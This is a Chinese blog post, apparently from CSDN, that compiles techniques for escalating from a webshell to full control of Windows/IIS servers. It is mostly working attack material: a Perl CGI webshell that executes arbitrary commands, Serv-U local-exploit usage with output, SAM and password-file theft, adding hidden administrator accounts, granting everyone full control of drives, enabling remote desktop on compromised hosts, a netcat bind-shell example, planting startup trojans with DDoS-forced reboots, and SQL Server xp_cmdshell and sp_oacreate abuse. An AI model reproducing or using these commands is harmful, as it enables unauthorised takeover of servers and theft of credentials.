webshell提权方法总结

最新推荐文章于 2022-12-24 20:33:11 发布
最新推荐文章于 2022-12-24 20:33:11 发布
阅读量411 收藏
点赞数
分类专栏: 黑客 文章标签: shell user xp cgi domain c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiazhijiang520/article/details/3437532
版权
 

webshell提权
1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆

2.C:/WINNT/system32/config/
进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside

3.C:/Documents and Settings/All Users/「开始」菜单/程序/
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=heart|1]
Password=mu126096AB858B7DF2FB117486CF018282
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=e:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

4.c:/winnt/system32/inetsrv/data/
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

5.看能否跳转到如下目录
c:/php, 用phpspy
c:/prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html/r/n/r/n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2fig;
$execthis = $_;
syswrite(STDOUT, "

/r/n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "/r/n

/r/n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c/perl/bin/su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[ ] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[ ] Domain xl:2 created

[ ] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[ ] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[ ] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:

http://anyhost//cmd.pl?c/perl/bin/su.exe " net localgroup administrators IUSR_anyhost /add"

6.可以成功运行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll" "C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显
<

用这段代码检查是否提升成功
<%@codepage=936%>

8.C:/Program Files/Java Web Start/
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:/Documents and Settings/All Users/「开始」菜单/程序/启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
[EXTERNAL]
ClientCheckDLL1=servu.dll

1:找台有4899的机器,可以进行4899登陆(前提)

2:把下列文字生成*.BAT传到肉鸡的C:下

echo [Components] > c:/sql
echo TSEnable = on >> c:/sql
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/sql /q

再用黑社会软件对其进行TELNET登陆并执行此文件,执行有个过程,一般3~5分钟不=

之后你可以扫描,发现他的3389端口开了!OK!

3:帐号建立 http://ww3.tty-1.net:808/main.htm

在肉鸡的TELNET下输入

net user 你想建立的用户名字 你想建立的用户密码 /add

net localgroup administrators 你建立的用户名字 /add

如果执行成功,则之后会命令下会有一排字"命令执行成功",等这条出现后再执行下一条即可

4:OK!成功!登陆吧!
使用sql的查询分析器并登陆
写入代码

declare @shell int exec sp_oacreate 'wscript.shell',
@shell output exec sp_oamethod @shell, 'run','null,'c:/winnt/system/cmd.exe /c net user 123 456 /add'

/不用多说创建用户为123密码为456/

declare @shell int exec sp_oacreate'wscript.shell',
@shell output exec sp_oamethod @shell,'run',null,'C:/winnt/system32/cmd.exe/ c net localgroup administrators 123/add',

把132提升权限

后面就用sql的cmd shell你想干什么就干什么吧.其实也可以windows下提权工具也很多.
SA权限仅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠,不过需要猜一下系统路径
nt/2k: x:/winnt/system32/
xp/2003: x:/windows/system32/
如果有回显,可以看到执行返回结果,否则需要先判断主机OS类型再试
当然如果野蛮一点,四个轮流来一遍也行。

首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE/Microsoft/Jet/4.0/Engines''SandBoxMode''REG_DWORD'1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0'';database=c:/winnt/system32/ias/ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')

扩展储存过程被删除以后可以有很简单的办法恢复:

删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复,不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'


开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell

asp木马提权

net user 查看是否有cmd的权限
如果没有用海洋2005配合上传的cmd.exe来执行
假如:上传一个工具ftp.exe 具体的路径是:D:/mine/ftp.exe
现在加个管理员帐号命令是 D:/mine/ftp.exe "net user mackson$ mackson /add"
现在我们来把mackson这个帐号提升为管理员````
这里是命令D:/mine/ftp.exe"net localgroup administrators mackson$ /add"
现在我们来看看mackson 这个帐号的资料 命令: net user mackson$
如果是管理员的话,现在我们主要是去开他3389 然后终端连接
我们传个3389.exe去
D:/mine/3389.exe这就是开33898终端服务的工具路径了````
上传开启3389的软件地址:D:/mine/3389.exe
我们只要在CMD里面输入D:/mine/ftp.exe "D:/mine/3389.exe"
现在只需要在CMD命令输入里面 输入上面的命令 然后回车就可以开他3389 了
服务器重启中。。。。。
重启后,打开远程桌面连接。

泡面之夏
关注
专栏目录
webshell提权工具工具
11-26
web提权工具,一个好用的serv-u目录查看工具,哈哈哈哈哈哈哈哈
webshell提权
最新发布
m0_65096687的博客
05-23 1203
首先我们要清楚为什么要提权相关操作被拒绝。无法继续进行渗透。就需要提权我们通过各种web漏洞,中间件漏洞,或者cms等漏洞拿到权限后。得到的权限一般是后台权限,有些是webshell权限。如果是后台权限,我们就要通过后台上传后门得到webshell。然后反弹到我们的渗透工具中进行使用。我们所使用的蚁剑,哥斯拉,冰蝎,原理都是一种webshell管理工具。但我们的最终目的是为了得到服务器的权限,而且是服务器的最高权限。我们才能更好的利用工具进行后渗透,也就是内网渗透。渗透的权限从低到高大概分为。
webshell 提权
m0_37442062的博客
05-09 855
服务器教程-webshell 提权方法 服务器提权教程 webshell提权拿服务器方法总结 - xysoul的专栏 - CSDN博客 最全面的 webshell 提权资料之一 - 颓废's Blog
WEBSHELL提权方法总结
02-24
### WEBSHELL提权方法总结 #### 一、概述 在网络安全领域,WebShell作为攻击者获取服务器控制权的一种手段,被广泛应用于渗透测试及恶意攻击活动中。提权(Privilege Escalation)是指利用已有的权限进一步获取系统...
最全的WEBSHELL提权方法总结
12-28
最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看
webshell提权教程
06-12
总结Webshell提权是一项涉及系统安全、网络攻防的重要技能。了解其原理、技巧并采取相应的防护措施,对于保障网络安全至关重要。在实际操作中,应遵循法律法规,合法合规地进行安全研究和防护工作。
另类webshell提权1
08-08
总结来说,这个案例展示了攻击者如何利用SQL Server的漏洞和配置来提权。尽管有一些安全措施(如禁用`xp_cmdshell`)来阻止这种行为,但在某些情况下,攻击者仍然可以找到方法绕过这些限制。因此,保持系统和应用...
WEBSHELL提权总结思路问题
07-24
WEBSHELL提权总结思路问题,可以学习一下啊,比较全面了
Linux下WEBSHELL提权一技
06-15
Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
CVE-2018-8120-Webshell下可用版本提权
07-16
1 漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美国微软(Microsoft)公司的产品。Microsoft Windows 7 SP1是一套供个人电脑使用的操作系统;Windows Server 2008 SP2是一套服务器操作系统。R2 SP1是它的升级版。 Microsoft Windows中存在提权漏洞,该漏洞源于Win32k组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以提升的权限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统: Microsoft Windows 7 SP1 Windows Server 2008 SP2 Windows Server 2008 R2 SP1 来自GIT一位大神的exp 使用方式
webshell最新内核提权工具
07-29
webshell最新内核提权工具 用法很简单 就是 xx.exe “命令” 比巴西烤肉和pr要好用很多 很多都能提权
Metasploit之webshell提权
weixin_34318272的博客
05-03 293
Metasploit之webshell提权 本文所涉及的方法只能在已授权的机器上做测试。 首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,...
Webshell的Windows提权
Feng_Blue_的博客
10-30 1864
本文仅提供于学术探讨,如有后果自行承担。 Webshell的Windows提权 内网搭建
webshell提权的几种方法
fireman
07-14 1089
话说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 **************************************************************************** 第一 如果服务器上有装了pcanywhere服务端,管理员为
webshell控制目标:对服务器进行提权以访问远程服务器
Zeker62的博客
08-03 911
什么是提权 提权是提取/提高权限的意思 一般作为访问者,权限比较低,需要提高权限进一步操作。 最想拥有的是管理员的权限。 提权原理: 访问服务器的时候,直接访问一般权限很低。 这个时候我们可以通过一些权限比较高的软件/用户/进程等来操作我们的账户,让我们账户的权限提高。 EXP和POC exp:是指漏洞可以利用代码,运行后直接利用相应的漏洞 poc:是指漏洞可以验证代码,检测是否存在漏洞。 提权过程 靶场:封神台:https://hack.zkaq.cn/battle/target?id=3eb7bec
【网络安全】SQL 注入新思维之 webshell 提权
zxcvbnmasdflzl的博客
12-24 843
大量的 hr 面试官都喜欢从 SQL 注入开始询问,所以留心了一下关于 SQL 注入的问题的频率。结果非常惊讶!不出意外的是--os-shell 名列榜首。比如这道题:SQL 注入 getshell 的方式?答:getshell 是指攻击者通过利用 SQL 注入获取系统权限的方法Webshell 提权分两种:一是利用outfile 函数,另外一种是利用**--os-shell**;UDF 提权通过堆叠注入实现;MOF 提权通过"条件竞争"实现。
SQLmap使用指南:数据库提权Webshell获取
4. UDF(User Defined Function)提权 在MySQL的sql-shell下,UDF可以被用来提升权限。攻击者可以利用这个功能来执行恶意代码或获取更高级的访问权限。 需要注意的是,尽管SQLmap提供了这些功能,但实际测试时并非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值